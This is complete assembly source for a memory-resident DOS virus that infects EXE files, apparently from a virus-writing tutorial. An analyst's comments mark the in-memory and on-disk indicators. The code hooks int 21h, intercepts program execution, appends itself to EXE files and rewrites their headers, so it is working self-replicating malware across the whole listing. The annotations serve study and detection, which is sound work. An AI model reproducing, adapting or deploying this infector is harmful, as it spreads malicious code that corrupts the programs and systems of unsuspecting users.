- .286
- virus segment
- assume cs:virus, ds:virus, es:virus
-
- jumps
- org 0CBh
-
- ; Entry point of the appended code when an infected EXE is started.
- ; Flow of this block: work out the run-time displacement of the code (BP),
- ; query the int 21h chain for an already-resident copy, and if none
- ; answers: shrink the program's memory block, copy the code to the freed
- ; area at the top of conventional memory, hook int 21h and print a notice.
- ; Analyst note: the AX=0CBCBh -> BX=0C001h handshake, the 1 KB drop in
- ; the memory size word at 0:413h and an int 21h vector pointing into the
- ; top of memory are the in-memory indicators visible in this block.
- start:
-
- call delta ;Calculate delta offset: CALL pushes the run-time address of 'delta'
- delta:
- pop bp ;bp = run-time address of 'delta'
- sub bp,offset delta ;bp = run-time address minus assembled offset
-
- push ds ;save PSP address
-
- push cs cs ;TASM multi-operand push/pop:
- pop ds es ;ds = es = cs
-
- mov ax,0CBCBh ;our "Codebreaker" residency check
- int 21h ;>what is CB?
- cmp bx,0C001h ;>C001!! :o)
- je restore ;its already resident
-
- pop ds
- push ds ;PSP address back into DS
- ;--------------------------------------------------
- mov ax,ds ;MCB residency
- dec ax ;For further clarification
- mov ds,ax ;read Codebreaker Tutorial 3
- ; ds = PSP segment - 1, i.e. the paragraph just below the PSP, which the
- ; author's comments treat as the program's memory control block (MCB).
-
- sub word ptr ds:[3],40h ;MCB+3: shrink the block by 40h paragraphs (1 KB)
- sub word ptr ds:[12h],40h ;MCB+12h = PSP+2: lower the PSP's top-of-memory word to match
-
- xor ax,ax
- mov ds,ax ;ds = 0 to reach low memory
-
- dec word ptr ds:[413h] ;one unit less in the word at 0:413h (BIOS memory size, in KB)
-
- mov ax,word ptr ds:[413h]
- shl ax,6 ;KB * 64 = segment of the area just freed
-
- mov es,ax ;es = destination segment for the resident copy
-
- push cs
- pop ds
-
- lea si,[bp+start] ;ds:si = this running copy
- xor di,di ;es:di = offset 0 of the destination segment
- mov cx,the_end - start ;byte count = start..the_end
- rep movsb
- ;--------------------------------------------------
- xor ax,ax ;Setting of interrupts
- mov ds,ax ;For further clarification
- ;read Codebreaker Tutorial 3
- mov ax,es ;ax:bx = new handler, segment:offset inside the copy
- mov bx,new_int21h-start
- cli ;no interrupts while the two vector words are swapped
- xchg bx,word ptr ds:[21h*4] ;install new offset, fetch the old one
- xchg ax,word ptr ds:[21h*4+2] ;install new segment, fetch the old one
- mov word ptr es:[old_int21h-start],bx ;old vector becomes the operand of the
- mov word ptr es:[old_int21h+2-start],ax ;far jump stored at old_int21h
- sti
- ;--------------------------------------------------
- push cs cs
- pop ds es
-
- mov ah,9 ;Warns the poor shmuck
- lea dx,[bp+message] ;ds:dx = '$'-terminated notice text
- int 21h
-
- ; Hands control to the host program. Reached directly when a resident
- ; copy answered the check, or by falling through after installation.
- ; The saved host entry values (old_ip, old_cs, old_ss, old_sp) are copied
- ; into the four words that follow the 0EAh byte below, relocated by the
- ; load segment, and then used to reload SS:SP and far-jump to the host.
- restore: ;Control handed back
-
- lea si,[bp+old_ip] ;Restore orig IP
- lea di,[bp+original_ip]
- mov cx,4 ;4 words: ip, cs, ss, sp
- rep movsw ;ds = es = cs on both paths into this label
-
- ; Now for a clarification of the next four lines. At the beginning of
- ; the virus DS contains the address of the PSP. We now restore the
- ; address from the stack, place the address in ES. Then add 10h to
- ; skip over the PSP. Skip over the PSP(100h) with 10h? Sounds a little
- ; fishy, right? Well, remember that AX holds a segment value, so adding
- ; 10h moves it up 10h paragraphs. Each paragraph is 10h bytes, so
- ; 10h*10h=100h (PSP)
-
- pop ds
- mov ax,ds
- mov es,ax
- add ax,10h ;ax = PSP + 10h, the segment the saved header values are relative to
-
- add word ptr cs:[bp+original_cs],ax ;Orig CS
- cli ;no interrupts between loading SS and SP
- add ax,word ptr cs:[bp+original_ss] ;Orig SS
- mov ss,ax
- mov sp,word ptr cs:[bp+original_sp] ;Orig SP
- sti
-
- db 0eah ;jump to it: 0EAh is the far-jump opcode, its operand is the next two words
- original_ip dw ? ;far-jump offset, filled in at run time
- original_cs dw ? ;far-jump segment, filled in and relocated at run time
- original_ss dw ? ;not part of the jump; read by the code above
- original_sp dw ? ;not part of the jump; read by the code above
-
-
- ; Resident int 21h handler. Answers the AX=0CBCBh residency query with
- ; BX=0C001h, diverts AH=4Bh (the author's "execute" check) to 'infect',
- ; and passes every other request to the previous handler through the
- ; far jump whose operand is patched into old_int21h at install time.
- ; Analyst note: a handler in the int 21h chain that returns BX=0C001h
- ; for AX=0CBCBh identifies a resident copy of this sample.
- new_int21h: ;our int 21h handler
- pushf ;push the flags
- cmp ax,0CBCBh ;residency check
- jne no_install_check
- mov bx,0C001h ;already resident
- popf ;restore all flags
- iret ;return
- no_install_check:
- cmp ah,4bh ;check if execute
- je infect ;flags stay pushed; 'infect' comes back through 'return'
- return:
- popf ;restore all flags
- db 0eah ;jmp to orig int 21h
- old_int21h dd ? ;operand of the 0EAh far jump: the saved previous int 21h vector
-
- ; Reached from new_int21h when AH=4Bh, with the caller's DS:DX still
- ; naming the file about to be run. Saves the caller's registers, opens
- ; that file read/write and reads its first 1Ch bytes into 'header';
- ; anything without an EXE signature goes straight to 'close'.
- ; The int 21h calls made here pass through new_int21h again; none of
- ; them is AX=0CBCBh or AH=4Bh, so they reach the previous handler.
- infect:
- pusha ;only 286, saves all gen reg
- push ds
- push es
-
- call tsr_delta
- tsr_delta:
- pop bp ;a tsr delta offset %-)
- sub bp,offset tsr_delta ;the resident copy starts at offset 0, not at its assembled offset
-
- mov ax,3d02h ;open file in DS:DX
- int 21h
- jc exit ;open failed: restore registers and pass the call on
-
- xchg ax,bx ;file handle to bx
-
- push cs cs
- pop ds es ;ds = es = cs so the buffers below are addressable
-
- mov ah,3fh ;Read the target header
- lea dx,[bp+header] ;into our buffer
-
- mov cx,1ch ;1Ch bytes, the size of the 'header' buffer
- int 21h
-
- cmp word ptr cs:[bp+header],'ZM' ;check if its an EXE
- je ok
- cmp word ptr cs:[bp+header],'MZ' ;either byte order of the signature is accepted
- je ok
- jmp close
-
- ; Infection body, entered once the header buffer holds an EXE header.
- ; Skips files already carrying the marker in the header word at 12h
- ; (labelled "Checksum" by the author), saves the host's entry values,
- ; points the header's entry at the current end of file, recomputes the
- ; page count for the larger file, appends start..the_end and rewrites
- ; the 1Ch-byte header.
- ; Analyst note: on disk the result is a file grown by (the_end - start)
- ; bytes, whose header entry point lies at the old end of file and whose
- ; word at header offset 12h equals the 'BC' constant; nothing in this
- ; routine touches the file's date/time, so the write shows there too.
- ok:
- cmp word ptr cs:[bp+header+12h],'BC' ;Checksum value checked for
- je close ;previous infection
-
- mov word ptr cs:[bp+header+12h],'BC' ;Mark it as infected
-
- mov ax,word ptr cs:[bp+header+14h] ;Save orig ExeIP
- mov word ptr cs:[bp+old_ip],ax ;Store in our buffer
- mov ax,word ptr cs:[bp+header+16h] ;Save orig ReloCS
- mov word ptr cs:[bp+old_cs],ax
- mov ax,word ptr cs:[bp+header+0eh] ;Save orig ReloSS
- mov word ptr cs:[bp+old_ss],ax
- mov ax,word ptr cs:[bp+header+10h] ;Save orig ExeSP
- mov word ptr cs:[bp+old_sp],ax
-
- mov ax,4202h ;Set pointer to end of file
- xor cx,cx
- xor dx,dx
- int 21h ;returns the new position, i.e. the file size, in dx:ax
-
- push ax dx ;Save EOF results
-
- ;Calculate new CS:IP, we set
- ;it to the EOF (this is where
- ;we will attach our virus)
-
- mov cx,16 ;Convert filesize into 16 byte
- div cx ;paragraphs
- ; ax = file size in paragraphs, dx = file size mod 16
-
- sub ax,word ptr cs:[bp+header+8] ;Subtract Header size from
- ;filesize to get the image
- ;(code/data) size.
-
- ;save:
- mov word ptr cs:[bp+header+14h],dx ;New ExeIP
- mov word ptr cs:[bp+header+16h],ax ;New ReloCS
-
- pop dx ax ;restore saved filesize
-
- add ax,the_end - start ;Add virus size to file size
- adc dx,0 ;Adds carry to DX
-
- mov cx,512 ;Calculate amount of pages
- div cx ;ax = whole 512-byte pages, dx = bytes left over
-
- cmp dx,0
- je no_remainder
- inc ax ;if remainder, add 1
- no_remainder:
-
- mov word ptr cs:[bp+header+4],ax ;New PageCnt
- mov word ptr cs:[bp+header+2],dx ;New PartPag
-
- mov ah,40h ;write the virus to the EOF
- lea dx,[bp+start] ;ds:dx = start of the resident copy
- mov cx,the_end - start ;same span that was copied into memory at install time
- int 21h
-
- mov ax,4200h ;Send pointer to beginning
- xor cx,cx
- xor dx,dx
- int 21h
-
- mov ah,40h ;Write the new header
- lea dx,[bp+header]
- mov cx,1ch ;the same 1Ch bytes that were read, now modified
- int 21h
-
- mov al,7 ;character 7 (bell)
- int 29h ; just a BEEEEEPPP
-
- ; Common exit of the exec hook: 'close' releases the handle in BX,
- ; 'exit' restores the caller's registers saved at 'infect' and rejoins
- ; new_int21h at 'return', which forwards the original AH=4Bh request
- ; to the previous handler.
- close:
- mov ah,3eh ;close file
- int 21h
-
- exit:
- pop es ;reverse order of the pushes at 'infect'
- pop ds
- popa
- jmp return ;the flags pushed by new_int21h are popped there
-
-
- ; Saved entry values of the host program, in the order 'restore' copies
- ; them (four consecutive words: ip, cs, ss, sp). The initial values below
- ; apply to the freshly assembled build; 'ok' overwrites them with the
- ; target's header values before the code is written to that file.
- old_ip dw offset exit_prog
- old_cs dw 0
- old_ss dw 0
- old_sp dw 0fffeh
-
- header db 1ch dup(?) ;Buffer for header
-
- ; Notice printed once at install time through int 21h AH=9, which stops
- ; at the '$' terminator.
- message db 10,13,10,13
- db '- SPo0ky''s EXAMPLE TSR EXE infector for Horny Toad''s ''Guide To EXE Infection'' -',10,13
- db '- has been installed in your computers memory and will from now on infect any -',10,13
- db '- EXE file that you execute. -',10,13
- db '- You can use TBCLEAN (www.thunderbyte.com) to clean this virus. -',10,13,10,13
- db ' - www.codebreakers.org -',10,13,'$'
-
- ; End of the span (start..the_end) that is copied to memory and appended
- ; to files; its length is the size growth of an infected file.
- the_end:
-
- ; Lies after the_end, so it is outside the start..the_end span that is
- ; copied to memory and written to files. old_ip is initialised to this
- ; label, so it presumably serves only the freshly assembled build, where
- ; the 'restore' jump has no host program to return to.
- exit_prog:
- mov ax,4c00h ;Request terminate program
- int 21h
-
- virus ends
- end start